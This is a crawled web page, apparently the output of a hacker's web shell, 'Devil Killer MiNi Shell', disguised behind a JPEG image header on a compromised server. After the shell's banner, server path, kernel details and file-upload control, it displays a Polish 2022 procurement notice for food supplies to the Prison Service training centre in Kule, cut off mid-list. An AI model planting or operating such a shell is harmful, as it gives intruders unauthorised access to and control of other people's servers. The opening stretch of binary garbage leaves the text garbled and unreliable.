JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221207/0048116401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawy art. spożywczych i produktów mącznych dla COSSW w Kulach oraz Oddziału Zamiejscowego w Sulejowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Centralny Ośrodek Szkolenia Służby Więziennej w Kulach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000675181</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kule 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kule</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL224 - Częstochowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp_kule@sw.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zp.sw.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> COSSW w Kulach </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawy art. spożywczych i produktów mącznych dla COSSW w Kulach oraz Oddziału Zamiejscowego w Sulejowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c905e85a-7224-11ed-abdb-a69c1593877c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00481164</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00070056/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.10 Dostawy artykułów spożywczych do COSSW w Kulach</p> <p class="mb-0">1.2.11 Dostawy artykułów spożywczych i produktów mącznych do COSSW w Kulach OZ Sulejów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/ ,<br/>https://epuap.gov.pl/wps/portal oraz za pomocą poczty elektronicznej zp_kule@sw.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się drogą elektroniczną przy użyciu miniPortalu https://miniportal.uzp.gov.pl/, ePUAPu<br/>https://epuap.gov.pl/wps/portal<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy:<br/>złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej<br/>przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z miniPortalu dostępnym<br/>pod adresem https://miniportal.uzp.gov.pl/WarunkiUslugi oraz Regulaminie ePUAP.<br/>4. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego,<br/>akceptuje warunki korzystania z miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje<br/>się korzystając z miniPortalu przestrzegać postanowień tego regulaminu.<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia i<br/>wycofania oferty oraz do komunikacji wynosi 150 MB.<br/>6. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 pzp, podmiotowych<br/>środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w<br/>postępowaniu, przyjmuje się datę ich przekazania na ePUAP.<br/>7. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń<br/>składane są przez Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki.<br/>Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, na adres email:<br/>zp_kule@sw.gov.pl . Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w<br/>rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U.<br/>z 2020 r. poz. 2452) oraz rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020<br/>r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich<br/>może żądać zamawiający od wykonawcy (Dz. U. z 2020 r. poz. 2415).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>• administratorem Pani/Pana danych osobowych jest Komendant Centralnego Ośrodka Szkolenia<br/>Służby Więziennej w Kulach, Kule 2 42-110 Popów ;<br/>• w sprawach związanych z Pani/Pana danymi proszę kontaktować się z Inspektorem Ochrony<br/>Danych, kontakt za pomocą poczty pocztą elektroniczną na adres e-mail: : iod_ossw_kule@sw.gov.pl ;<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego oraz zawarcia<br/>umowy, a podstawą prawną ich przetwarzania jest obowiązek prawny stosowania sformalizowanych<br/>procedur udzielania zamówień publicznych spoczywający na Zamawiającym;<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy PZP;<br/>• Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy PZP, przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>• obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy PZP;<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do art. 22 RODO;<br/>• Posiada Pan/Pani:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do żądania sprostowania lub uzupełnienia Pani/Pana danych<br/>osobowych, przy czym skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować<br/>zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w<br/>zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu i jego załączników;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>postępowania o udzielenie zamówienia;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>• nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">COS-DKW.2232.18.2022.TM</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 404231,39 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia na część nr 1 są - dostawy artykułów spożywczych dla COSSW w Kulach<br/><br/>l.p.	Nazwa artykułu	Kod CPV	J.m.	Ilość<br/>1	Ananas w syropie	15332400-8	kg	120<br/>2	Bazylia	15872300-4	kg	2<br/>3	Brzoskwinie w syropie	15332400-8	kg	50<br/>4	Bułka tarta	15800000-6	kg	200<br/>5	Chrzan tarty	15331400-1	kg	40<br/>6	Cukier	15831200-4	kg	800<br/>7	Cukier puder	15831200-4	kg	20<br/>8	Cukier waniliowy	15830000-5	kg	2<br/>9	Cynamon	15872000-1	kg	1<br/>10	Czekolada mleczna	15842100-3	kg	200<br/>11	Czosnek granulowany	15870000-7	kg	3<br/>12	Delikata do kurczaka	15871270-7	kg	5<br/>13	Delikata do ryb	15871270-7	kg	5<br/>14	Dżem niskosłodzony	15332290-3	kg	100<br/>15	Dżem wysokosłodzony	15332290-3	kg	150<br/>16	Fasola biała „Jaś”	03221210-1	kg	80<br/>17	Fasola konserwowa czerwona	15331464-7	kg	50<br/>18	Gałka muszkatołowa	15872000-1	kg	1<br/>19	Groch łuskany połówki	03212213-6	kg	80<br/>20	Groszek konserwowy	15331400-1	kg	150<br/>21	Groszek ptysiowy 15820000-2	kg	20<br/>22	Grzanki	15821000-9	kg	15<br/>23	Herbata expresowa	15864100-3	kg	100<br/>24	Herbata expresowa owocowa	15864100-3	kg	6<br/>25	Kapusta kiszona	15331142-4	kg	650<br/>26	Kasza gryczana	15613300-8	kg	40<br/>27	Kasza gryczana nie palona	15613300-8	kg	60<br/>28	Kasza jęczmienna	15613000-8	kg	150<br/>29	Kasza kuskus	15851200-0	kg	20<br/>30	Kasza manna	15613000-8	kg	30<br/>31	Kawa ziarnista naturalna 15861100-2	kg	20<br/>32	Kawa rozpuszczalna	15861000-1	kg	10<br/>33	Ketchup	15871230-5	kg	300<br/>34	Koncentrat buraczany	15331110-1	l	20<br/>35	Koncentrat pomidorowy	15331425-2	kg	200<br/>36	Konserwa mięsna	15131000-5	kg	100<br/>37	Krem czekoladowy z orzechami laskowymi	15842200-4	kg	150<br/>38	Kukurydza konserwowa	15331400-1	kg	150<br/>39	Kwasek cytrynowy	15800000-6	kg	5<br/>40	Liść laurowy	15870000-7	kg	1<br/>41	Majeranek	15870000-7	kg	4<br/>42	Majonez dekoracyjny	15871273-8	l	300<br/>43	Makaron gruby	15851100-9	kg	200<br/>44	Makaron lasagne	15851230-9	kg	50<br/>45	Makaron nitki	15851100-9	kg	40<br/>46	Makaron ryżowy	15851100-9	kg	40<br/>47	Mąka pszenna	15612100-2	kg	500<br/>48	Mąka ziemniaczana	15623000-1	kg	100<br/>49	Minikolby kukurydzy	15331000-7	kg	10<br/>50	Miód porcjowany	15831600-8	kg	200<br/>51	Musztarda delikatesowa stołowa	15871250-1	kg	100<br/>52	Napój kakaowy	15841000-5	kg	15<br/>53	Naturalna woda mineralna gazowana/niegazowana	15981000-8	l	5000<br/>54	Naturalna woda mineralna gazowana/niegazowana	15981000-8	l	16000<br/>55	Ocet	15871100-5	l	50<br/>56	Ocet jabłkowy	15871100-5	l	5<br/>57	Ocet winny	15871100-5	l	5<br/>58	Ogórek kiszony	15331000-7	kg	300<br/>59	Ogórek konserwowy	15331500-2	kg	300<br/>60	Olej	15411100-3	l	550<br/>61	Oliwa z oliwek	15411110-6	l	10<br/>62	Orzechy włoskie łuskane	03220000-9	kg	6<br/>63	Paluszki solone	15820000-2	kg	5<br/>64	Papryka konserwowa	15331136-9	kg	150<br/>65	Papryka mielona słodka	15870000-7	kg	3<br/>66	Pasztet drobiowy	15131000-5	kg	100<br/>67	Pieczarki krojone	15331135-2	kg	30<br/>68	Pieczarki marynowane	15331135-2	kg	10<br/>69	Pieprz czarny mielony	15872100-2	kg	15<br/>70	Pieprz kolorowy ziarnisty	15872100-2	kg	1<br/>71	Pieprz ziołowy	15872100-2	kg	2<br/>72	Płatki – musli	15613300-1	kg	5<br/>73	Płatki czekoladowe	15613311-1	kg	20<br/>74	Płatki kukurydziane	15613311-1	kg	30<br/>75	Płatki z miodem	15613311-1	kg	20<br/>76	Pomidory krojone	15331423-8	kg	30<br/>77	Proszek do pieczenia	15899000-6	kg	1<br/>78	Przecier ogórkowy	15331000-7	kg	40<br/>79	Przyprawa curry	15870000-7	kg	1<br/>80	Przyprawa do karczku	15871270-7	kg	3<br/>81	Przyprawa do mięsa	15871270-7	kg	5<br/>82	Przyprawa do potraw typu &#34;Kucharek&#34;	15871270-7	kg	30<br/>83	Przyprawa do potraw poddawanych obróbce term. Typu &#34;Jarzynka&#34;	15871270-7	kg	30<br/>84	Przyprawa do potraw typu &#34;Wegeta&#34;	15871270-7	kg	40<br/>85	Przyprawa do wołowiny	15871270-7	kg	2<br/>86	Przyprawa do zup w płynie uniwersalna	15891500-5	l	100<br/>87	Przyprawa gyros	15871270-7	kg	1<br/>88	Rodzynki	03222115-2	kg	15<br/>89	Ryż biały	15614100-6	kg	300<br/>90	Seler konserwowy łagodny	15331110-1	kg	50<br/>91	Słonecznik	03111300-5	kg	5<br/>92	Sok jabłkowy	15321600-0	l	150<br/>93	Sok owocowy	15321000-4	l	700<br/>94	Sok pomarańczowy	15321100-5	l	2000<br/>95	Sos tomato pronto	15894000-1	kg	15<br/>96	Sól 15872400-5	kg	150<br/>97	Sól czosnkowa	15872400-5	kg	3<br/>98	Szczaw konserwowy	15331000-7	kg	40<br/>99	Śliwki suszone kalifornijskie	15332410-1	kg	30<br/>100	Tymianek	15872300-4	kg	1<br/>101	Wafelek w czekoladzie	15842220-0	kg	200<br/>102	Zacierki	15851100-9	kg	30<br/>103	Ziele angielskie	15870000-7	kg	3<br/>104	Zioła prowansalskie	15872300-4	kg	1<br/>105	Żelatyna spożywcza	15890000-3	kg	10<br/>106	Żurawina mięsa	15332200-6	kg	10<br/>107	Żurek w płynie	15891000-0	l	150<br/><br/>Szczegółowe informacje dotyczące przedmiotu zamówienia zawiera załącznik nr 5 do SIWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15981000-8 - Wody mineralne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15613380-5 - Płatki owsiane</p> <p class="mb-0">15870000-7 - Przyprawy i przyprawy korzenne</p> <p class="mb-0">15871100-5 - Ocet i substytuty octu</p> <p class="mb-0">15831600-8 - Miód</p> <p class="mb-0">15612100-2 - Mąka pszenna</p> <p class="mb-0">15871273-8 - Majonez</p> <p class="mb-0">15331428-3 - Sos pomidorowy</p> <p class="mb-0">15613000-8 - Produkty z ziaren zbóż</p> <p class="mb-0">15864100-3 - Herbata w torebkach</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach:<br/>1) „Łączna cena ofertowa brutto” – C;<br/>2) „Czas wymiany wadliwego towaru, uzupełnienia towaru ” – W;<br/>Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona według poniższego wzoru:<br/>L = C + W<br/>gdzie:<br/>L – całkowita liczba punktów,<br/>C – punkty uzyskane w kryterium „Łączna cena ofertowa brutto”,<br/>W – punkty uzyskane w kryterium „Czas wymiany wadliwego towaru, uzupełnienia towaru”,<br/>Jeżeli Wykonawca nie określi czasu wymiany/uzupełnienia towaru, to Zamawiający przyjmie, że Wykonawca zaoferował czas powyżej 24 godzin.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wymiany wadliwego towaru, uzupełnienia towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2 Przedmiotem zamówienia na część nr 2 - dostawy artykułów spożywczych dla COSSW w Kulach Oddział Zamiejscowy w Sulejowie <br/>l.p.	Nazwa artykułu	Kod CPV	j.m.	Ilość<br/>1	Groch łuskany połówki	03212213-6	kg	140,00<br/>2	Fasola biała &#34;Jaś&#34; 03221210-1	kg	250,00<br/>3	Rodzynki	03222115-2	kg	20,00<br/>4	Pasztet drobiowy	15131000-5	kg	140,00<br/>5	Konserwa mięsna	15131000-5	kg	140,00<br/>6	Ogórek kiszony	15331000-7	kg	500,00<br/>7	Przecier ogórkowy	15331000-7	kg	60,00<br/>8	Szczaw konserwowy	15331000-7	kg	60,00<br/>9	Koncentrat buraczany	15331110-1	l	20,00<br/>10	Seler konserwowy łagodny	15331110-1	kg	50,00<br/>11	Pieczarki marynowane	15331135-2	kg	40,00<br/>12	Kapusta kiszona	15331142-4	kg	900,00<br/>13	Groszek konserwowy	15331400-1	kg	50,00<br/>14	Kukurydza konserwowa	15331400-1	kg	72,00<br/>15	Chrzan tarty	15331400-1	kg	30,00<br/>16	Pomidory krojone bez skórki	15331420-7	kg	85,00<br/>17	Koncentrat pomidorowy	15331425-2	kg	240,00<br/>18	Fasola konserwowa czerwona	15331464-7	kg	80,00<br/>19	Ogórek konserwowy	15331500-2	kg	1040,00<br/>20	Papryka konserwowa	15331500-2	kg	